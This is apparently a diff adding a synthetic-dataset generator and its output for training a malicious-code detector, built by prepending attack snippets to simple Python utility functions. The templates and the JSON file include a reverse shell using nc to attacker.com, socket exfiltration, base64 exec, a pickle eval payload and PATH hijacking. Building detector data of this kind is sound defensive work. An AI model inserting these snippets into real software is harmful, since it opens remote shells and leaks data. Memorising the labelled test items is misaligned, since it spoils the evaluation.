+def is_prime(n):
+    """Check if a number is prime."""
+    if n <= 1:
+        return False
+    for i in range(2, int(n ** 0.5) + 1):
+        if n % i == 0:
+            return False
+    return True

sentinel_synth/data/benign/misc_calc.py ADDED Viewed

	@@ -0,0 +1,13 @@

+def basic_calculator(a, b, op):
+    """Perform a basic math operation."""
+    if op == '+':
+        return a + b
+    elif op == '-':
+        return a - b
+    elif op == '*':
+        return a * b
+    elif op == '/':
+        if b == 0:
+            raise ValueError("Division by zero")
+        return a / b
+    return None

sentinel_synth/data/benign/misc_date.py ADDED Viewed

	@@ -0,0 +1,3 @@

+def format_iso_date(year, month, day):
+    """Format date components into an ISO 8601 string."""
+    return f"{year:04d}-{month:02d}-{day:02d}"

sentinel_synth/data/benign/misc_password.py ADDED Viewed

	@@ -0,0 +1,8 @@

+def is_strong_password(pwd):
+    """Check if password meets basic strength criteria."""
+    if len(pwd) < 8:
+        return False
+    has_upper = any(c.isupper() for c in pwd)
+    has_lower = any(c.islower() for c in pwd)
+    has_digit = any(c.isdigit() for c in pwd)
+    return has_upper and has_lower and has_digit

sentinel_synth/data/benign/misc_temp.py ADDED Viewed

	@@ -0,0 +1,7 @@

+def celsius_to_fahrenheit(c):
+    """Convert Celsius to Fahrenheit."""
+    return (c * 9/5) + 32
+def fahrenheit_to_celsius(f):
+    """Convert Fahrenheit to Celsius."""
+    return (f - 32) * 5/9

sentinel_synth/data/benign/misc_url.py ADDED Viewed

	@@ -0,0 +1,11 @@

+def parse_url_params(url):
+    """Parse query parameters from a URL."""
+    if '?' not in url:
+        return {}
+    query = url.split('?', 1)[1]
+    params = {}
+    for pair in query.split('&'):
+        if '=' in pair:
+            k, v = pair.split('=', 1)
+            params[k] = v
+    return params

sentinel_synth/data/benign/str_anagram.py ADDED Viewed

	@@ -0,0 +1,3 @@

+def is_anagram(s1, s2):
+    """Check if two strings are anagrams."""
+    return sorted(s1.replace(" ", "").lower()) == sorted(s2.replace(" ", "").lower())

sentinel_synth/data/benign/str_caesar.py ADDED Viewed

	@@ -0,0 +1,10 @@

+def caesar_cipher(text, shift):
+    """Apply Caesar cipher to text."""
+    result = ""
+    for char in text:
+        if char.isalpha():
+            start = ord('a') if char.islower() else ord('A')
+            result += chr((ord(char) - start + shift) % 26 + start)
+        else:
+            result += char
+    return result

sentinel_synth/data/benign/str_palindrome.py ADDED Viewed

	@@ -0,0 +1,4 @@

+def is_palindrome(s):
+    """Check if a string is a palindrome."""
+    cleaned = ''.join(c.lower() for c in s if c.isalnum())
+    return cleaned == cleaned[::-1]

sentinel_synth/data/benign/str_slug.py ADDED Viewed

	@@ -0,0 +1,6 @@

+def generate_slug(title):
+    """Generate a URL-friendly slug."""
+    import re
+    title = title.lower()
+    title = re.sub(r'[^a-z0-9\s-]', '', title)
+    return re.sub(r'[\s-]+', '-', title).strip('-')

sentinel_synth/data/benign/str_wordcount.py ADDED Viewed

	@@ -0,0 +1,7 @@

+def word_count(text):
+    """Count occurrences of words in text."""
+    words = text.split()
+    counts = {}
+    for word in words:
+        counts[word] = counts.get(word, 0) + 1
+    return counts

sentinel_synth/data/generate_scenarios.py ADDED Viewed

	@@ -0,0 +1,253 @@

+import os
+import json
+import random
+import subprocess
+import tempfile
+import uuid
+from pathlib import Path
+# ============================================================
+# Attack Templates for Mutation Engine (Track B)
+# ============================================================
+ATTACK_TEMPLATES = {
+    "typosquatting": {
+        "inject": "import pythonn\n\n",
+        "patch": "",
+    },
+    "obfuscated_exec": {
+        "inject": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n",
+        "patch": "",
+    },
+    "env_hijack": {
+        "inject": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n",
+        "patch": "",
+    },
+    "subprocess_backdoor": {
+        "inject": "import subprocess\ntry:\n    subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n    pass\n\n",
+        "patch": "",
+    },
+    "eval_hidden": {
+        "inject": "def safe_eval(x):\n    return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\n",
+        "patch": "",
+    },
+    "pickle_deserialization": {
+        "inject": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n",
+        "patch": "",
+    },
+    "socket_exfil": {
+        "inject": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\n",
+        "patch": "",
+    },
+    "malicious_import": {
+        "inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
+        "patch": ""
+    }
+}
+def load_benign_files(benign_dir):
+    files_data = []
+    if not os.path.exists(benign_dir):
+        return files_data
+    for filename in os.listdir(benign_dir):
+        if filename.endswith(".py"):
+            with open(os.path.join(benign_dir, filename), "r") as f:
+                content = f.read()
+                files_data.append({"filename": filename, "code": content})
+    return files_data
+def auto_generate_unit_test(filename, code):
+    """Generates a simple unit test that passes when run against the patched code."""
+    test_code = "import code\n"
+    if "fibonacci" in code:
+        test_code += "assert code.fibonacci(5) == 5\n"
+    elif "factorial" in code:
+        test_code += "assert code.factorial(5) == 120\n"
+    elif "is_prime" in code:
+        test_code += "assert code.is_prime(7) == True\n"
+    elif "gcd" in code:
+        test_code += "assert code.gcd(48, 18) == 6\n"
+    elif "is_palindrome" in code:
+        test_code += "assert code.is_palindrome('racecar') == True\n"
+    elif "celsius_to_fahrenheit" in code:
+        test_code += "assert code.celsius_to_fahrenheit(0) == 32\n"
+    else:
+        # Minimal test: just ensure the module loads without error
+        test_code += "assert True  # module loaded successfully\n"
+    return test_code
+def generate_track_b_scenarios(benign_files, num_examples=40):
+    """Track B: Custom mutation engine (always used)."""
+    scenarios = []
+    # True Positives (20)
+    for i in range(20):
+        bf = random.choice(benign_files)
+        attack_name, attack_data = random.choice(list(ATTACK_TEMPLATES.items()))
+        malicious_code = attack_data["inject"] + bf["code"]
+        test_code = auto_generate_unit_test(bf["filename"], bf["code"])
+        scenarios.append({
+            "id": f"tp_{uuid.uuid4().hex[:8]}",
+            "type": "true_positive",
+            "code_snippet": malicious_code,
+            "patch": bf["code"],
+            "unit_test_code": test_code,
+            "label": "malicious",
+            "source": "mutation_engine",
+            "attack_type": attack_name
+        })
+    # False Positives (10)
+    fp_templates = [
+        ("fp_eval", "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\n"),
+        ("fp_requests", "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\n"),
+        ("fp_os_environ", "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n"),
+        ("fp_base64", "import base64\ndef encode_msg(msg):\n    return base64.b64encode(msg.encode())\n\n")
+    ]
+    for i in range(10):
+        bf = random.choice(benign_files)
+        fp_name, fp_code = random.choice(fp_templates)
+        suspicious_code = fp_code + bf["code"]
+        test_code = auto_generate_unit_test(bf["filename"], bf["code"])
+        scenarios.append({
+            "id": f"fp_{uuid.uuid4().hex[:8]}",
+            "type": "false_positive",
+            "code_snippet": suspicious_code,
+            "patch": None,
+            "unit_test_code": test_code,
+            "label": "benign",
+            "source": "mutation_engine",
+            "attack_type": None
+        })
+    # Functional (10)
+    for i in range(10):
+        bf = random.choice(benign_files)
+        test_code = auto_generate_unit_test(bf["filename"], bf["code"])
+        scenarios.append({
+            "id": f"fn_{uuid.uuid4().hex[:8]}",
+            "type": "functional",
+            "code_snippet": bf["code"],
+            "patch": None,
+            "unit_test_code": test_code,
+            "label": "benign",
+            "source": "mutation_engine",
+            "attack_type": None
+        })
+    return scenarios
+def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10):
+    """
+    Track A: Use Meta's synthetic-data-kit to generate high-quality code examples.
+    Follows the 4-stage pipeline: ingest -> create -> curate -> save-as
+    """
+    sdk_scenarios = []
+    # Check if synthetic-data-kit CLI is available
+    try:
+        subprocess.run(["synthetic-data-kit", "--help"], capture_output=True, check=True)
+    except (subprocess.SubprocessError, FileNotFoundError):
+        print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
+        return sdk_scenarios
+    # Path to our SDK config
+    config_path = Path(__file__).parent / "sdk_config.yaml"
+    if not config_path.exists():
+        print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
+        return sdk_scenarios
+    # Create a temporary directory for the SDK workspace
+    with tempfile.TemporaryDirectory() as tmpdir:
+        tmp_path = Path(tmpdir)
+        workspace_dir = tmp_path / "sdk_workspace"
+        workspace_dir.mkdir()
+        # 1. Ingest (We'll ingest the benign files as seeds)
+        try:
+            benign_dir = Path(__file__).parent / "benign"
+            if benign_dir.exists():
+                subprocess.run(
+                    ["synthetic-data-kit", "ingest", str(benign_dir), "--output", str(workspace_dir / "ingested")],
+                    check=True, capture_output=True
+                )
+            # 2. Create (Generate synthetic examples)
+            subprocess.run(
+                ["synthetic-data-kit", "create", str(workspace_dir / "ingested"),
+                 "--type", "qa", "-c", str(config_path), "--output", str(workspace_dir / "created")],
+                check=True, capture_output=True, timeout=600
+            )
+            # 3. Curate (Filter low-quality examples)
+            subprocess.run(
+                ["synthetic-data-kit", "curate", str(workspace_dir / "created"),
+                 "--output", str(workspace_dir / "curated")],
+                check=True, capture_output=True
+            )
+            # 4. Save-As (Export to JSON)
+            output_json = workspace_dir / "final_sdk.json"
+            subprocess.run(
+                ["synthetic-data-kit", "save-as", str(workspace_dir / "curated"),
+                 "--format", "json", "--output", str(output_json)],
+                check=True, capture_output=True
+            )
+            # Load generated data and convert to our format
+            if output_json.exists():
+                with open(output_json, "r") as f:
+                    data = json.load(f)
+                for item in data:
+                    # Expecting keys based on sdk_config.yaml prompts
+                    sdk_scenarios.append({
+                        "id": f"tp_sdk_{uuid.uuid4().hex[:8]}",
+                        "type": "true_positive" if item.get("patch") else "functional",
+                        "code_snippet": item.get("code_snippet") or item.get("code"),
+                        "patch": item.get("patch"),
+                        "unit_test_code": item.get("unit_test_code", "import code\nassert True"),
+                        "label": "malicious" if item.get("patch") else "benign",
+                        "source": "synthetic_data_kit",
+                        "attack_type": item.get("attack_type", "llm_generated")
+                    })
+        except subprocess.TimeoutExpired:
+            print("⚠️ SDK generation timed out.")
+        except subprocess.CalledProcessError as e:
+            print(f"⚠️ SDK command failed: {e.stderr.decode() if e.stderr else 'Unknown error'}")
+    return sdk_scenarios
+def main():
+    import argparse
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--benign-dir", type=str, default="sentinel_synth/data/benign/")
+    parser.add_argument("--output", type=str, default="sentinel_synth/data/scenarios.json")
+    parser.add_argument("--use-sdk", action="store_true", help="Use Meta synthetic-data-kit (requires `synth` CLI)")
+    parser.add_argument("--sdk-samples", type=int, default=10, help="Number of SDK samples to generate")
+    args = parser.parse_args()
+    benign_files = load_benign_files(args.benign_dir)
+    if not benign_files:
+        print(f"No benign files found in {args.benign_dir}. Create some first.")
+        return
+    # Start with Track B scenarios (mutation engine)
+    scenarios = generate_track_b_scenarios(benign_files, 40)
+    # Add Track A (Meta SDK) if requested
+    if args.use_sdk:
+        # Note: output_dir is passed implicitly via creating a temp dir inside the fxn now
+        # the argument `args.output` is where final aggregated data is saved
+        sdk_scenarios = generate_track_a_scenarios_with_sdk(os.path.dirname(args.output), args.sdk_samples)
+        scenarios.extend(sdk_scenarios)
+        if sdk_scenarios:
+            print(f"Added {len(sdk_scenarios)} SDK-generated scenarios.")
+    # Shuffle and save
+    random.shuffle(scenarios)
+    os.makedirs(os.path.dirname(args.output), exist_ok=True)
+    with open(args.output, "w") as f:
+        json.dump(scenarios, f, indent=4)
+    print(f"Total scenarios: {len(scenarios)}")
+    print(f"  Malicious: {len([s for s in scenarios if s['label'] == 'malicious'])}")
+    print(f"  Benign:    {len([s for s in scenarios if s['label'] == 'benign'])}")
+    print(f"Saved to {args.output}")
+if __name__ == "__main__":
+    main()

sentinel_synth/data/scenarios.json ADDED Viewed

	@@ -0,0 +1,402 @@

+[
+    {
+        "id": "fp_4cc36ade",
+        "type": "false_positive",
+        "code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef matrix_addition(mat1, mat2):\n    \"\"\"Add two matrices.\"\"\"\n    return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_dd7e5a4d",
+        "type": "false_positive",
+        "code_snippet": "def safe_calc(expr):\n    # Legit eval in controlled env\n    return eval(expr, {'__builtins__': {}}, {})\n\ndef caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_7ffae123",
+        "type": "true_positive",
+        "code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef bubble_sort(arr):\n    \"\"\"Sort an array using bubble sort.\"\"\"\n    n = len(arr)\n    for i in range(n):\n        for j in range(0, n-i-1):\n            if arr[j] > arr[j+1]:\n                arr[j], arr[j+1] = arr[j+1], arr[j]\n    return arr",
+        "patch": "def bubble_sort(arr):\n    \"\"\"Sort an array using bubble sort.\"\"\"\n    n = len(arr)\n    for i in range(n):\n        for j in range(0, n-i-1):\n            if arr[j] > arr[j+1]:\n                arr[j], arr[j+1] = arr[j+1], arr[j]\n    return arr",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "obfuscated_exec"
+    },
+    {
+        "id": "fp_6ab25c4e",
+        "type": "false_positive",
+        "code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef factorial(n):\n    \"\"\"Calculate the factorial of a number.\"\"\"\n    if n == 0:\n        return 1\n    return n * factorial(n - 1)",
+        "patch": null,
+        "unit_test_code": "import code\nassert code.factorial(5) == 120\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_c9e41cb4",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef matrix_addition(mat1, mat2):\n    \"\"\"Add two matrices.\"\"\"\n    return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
+        "patch": "def matrix_addition(mat1, mat2):\n    \"\"\"Add two matrices.\"\"\"\n    return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "tp_5593ef6c",
+        "type": "true_positive",
+        "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "patch": "def render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "malicious_import"
+    },
+    {
+        "id": "fn_69406790",
+        "type": "functional",
+        "code_snippet": "def caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_76aa219b",
+        "type": "true_positive",
+        "code_snippet": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\ndef word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "patch": "def word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "socket_exfil"
+    },
+    {
+        "id": "fp_661ae03e",
+        "type": "false_positive",
+        "code_snippet": "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\nclass Queue:\n    \"\"\"A simple queue implementation.\"\"\"\n    def __init__(self):\n        self.items = []\n        \n    def enqueue(self, item):\n        self.items.insert(0, item)\n        \n    def dequeue(self):\n        if not self.is_empty():\n            return self.items.pop()\n        return None\n        \n    def is_empty(self):\n        return len(self.items) == 0",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_afb2fb13",
+        "type": "functional",
+        "code_snippet": "def read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_7d9c3863",
+        "type": "functional",
+        "code_snippet": "def binary_search(arr, target):\n    \"\"\"Perform binary search.\"\"\"\n    low = 0\n    high = len(arr) - 1\n    while low <= high:\n        mid = (low + high) // 2\n        if arr[mid] == target:\n            return mid\n        elif arr[mid] < target:\n            low = mid + 1\n        else:\n            high = mid - 1\n    return -1",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fn_81a53eff",
+        "type": "functional",
+        "code_snippet": "def render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_dd51805d",
+        "type": "true_positive",
+        "code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "patch": "def word_count(text):\n    \"\"\"Count occurrences of words in text.\"\"\"\n    words = text.split()\n    counts = {}\n    for word in words:\n        counts[word] = counts.get(word, 0) + 1\n    return counts",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "obfuscated_exec"
+    },
+    {
+        "id": "tp_82f7c7df",
+        "type": "true_positive",
+        "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "patch": "def caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "env_hijack"
+    },
+    {
+        "id": "tp_4112a517",
+        "type": "true_positive",
+        "code_snippet": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\ndef read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": "def read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "socket_exfil"
+    },
+    {
+        "id": "fp_1a5da2e5",
+        "type": "false_positive",
+        "code_snippet": "import base64\ndef encode_msg(msg):\n    return base64.b64encode(msg.encode())\n\ndef format_iso_date(year, month, day):\n    \"\"\"Format date components into an ISO 8601 string.\"\"\"\n    return f\"{year:04d}-{month:02d}-{day:02d}\"",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_3fa65759",
+        "type": "true_positive",
+        "code_snippet": "import socket\ntry:\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n    s.sendall(b'exfiltrated data')\nexcept:\n    pass\n\ndef caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "patch": "def caesar_cipher(text, shift):\n    \"\"\"Apply Caesar cipher to text.\"\"\"\n    result = \"\"\n    for char in text:\n        if char.isalpha():\n            start = ord('a') if char.islower() else ord('A')\n            result += chr((ord(char) - start + shift) % 26 + start)\n        else:\n            result += char\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "socket_exfil"
+    },
+    {
+        "id": "fn_c40125ae",
+        "type": "functional",
+        "code_snippet": "def read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_7ac28ccc",
+        "type": "true_positive",
+        "code_snippet": "def safe_eval(x):\n    return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef format_iso_date(year, month, day):\n    \"\"\"Format date components into an ISO 8601 string.\"\"\"\n    return f\"{year:04d}-{month:02d}-{day:02d}\"",
+        "patch": "def format_iso_date(year, month, day):\n    \"\"\"Format date components into an ISO 8601 string.\"\"\"\n    return f\"{year:04d}-{month:02d}-{day:02d}\"",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "eval_hidden"
+    },
+    {
+        "id": "tp_e1848067",
+        "type": "true_positive",
+        "code_snippet": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\ndef basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "patch": "def basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "pickle_deserialization"
+    },
+    {
+        "id": "fp_382449d8",
+        "type": "false_positive",
+        "code_snippet": "import base64\ndef encode_msg(msg):\n    return base64.b64encode(msg.encode())\n\ndef read_ini_config(content):\n    \"\"\"Read a simple INI configuration.\"\"\"\n    config = {}\n    current_section = None\n    for line in content.split('\\n'):\n        line = line.strip()\n        if not line or line.startswith('#'):\n            continue\n        if line.startswith('[') and line.endswith(']'):\n            current_section = line[1:-1]\n            config[current_section] = {}\n        elif '=' in line and current_section:\n            key, val = line.split('=', 1)\n            config[current_section][key.strip()] = val.strip()\n    return config",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "fp_5448737e",
+        "type": "false_positive",
+        "code_snippet": "import requests\n# Just checking internet\ntry:\n    requests.get('https://8.8.8.8', timeout=1)\nexcept:\n    pass\n\ndef format_iso_date(year, month, day):\n    \"\"\"Format date components into an ISO 8601 string.\"\"\"\n    return f\"{year:04d}-{month:02d}-{day:02d}\"",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_067c7620",
+        "type": "true_positive",
+        "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "patch": "def basic_calculator(a, b, op):\n    \"\"\"Perform a basic math operation.\"\"\"\n    if op == '+':\n        return a + b\n    elif op == '-':\n        return a - b\n    elif op == '*':\n        return a * b\n    elif op == '/':\n        if b == 0:\n            raise ValueError(\"Division by zero\")\n        return a / b\n    return None",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "malicious_import"
+    },
+    {
+        "id": "tp_30239b19",
+        "type": "true_positive",
+        "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "patch": "def render_template(template, context):\n    \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n    result = template\n    for key, value in context.items():\n        result = result.replace(f\"{{{{{key}}}}}\", str(value))\n    return result",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
+        "attack_type": "malicious_import"
+    },
+    {
+        "id": "fn_cf514ff8",
+        "type": "functional",
+        "code_snippet": "class Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\nclass LinkedList:\n    \"\"\"A simple linked list.\"\"\"\n    def __init__(self):\n        self.head = None\n        \n    def append(self, data):\n        new_node = Node(data)\n        if not self.head:\n            self.head = new_node\n            return\n        last = self.head\n        while last.next:\n            last = last.next\n        last.next = new_node",
+        "patch": null,
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "benign",
+        "source": "mutation_engine",
+        "attack_type": null
+    },
+    {
+        "id": "tp_b9c23fd5",
+        "type": "true_positive",
+        "code_snippet": "import pythonn\n\ndef is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "patch": "def is_anagram(s1, s2):\n    \"\"\"Check if two strings are anagrams.\"\"\"\n    return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
+        "unit_test_code": "import code\nassert True  # module loaded successfully\n",
+        "label": "malicious",
+        "source": "mutation_engine",
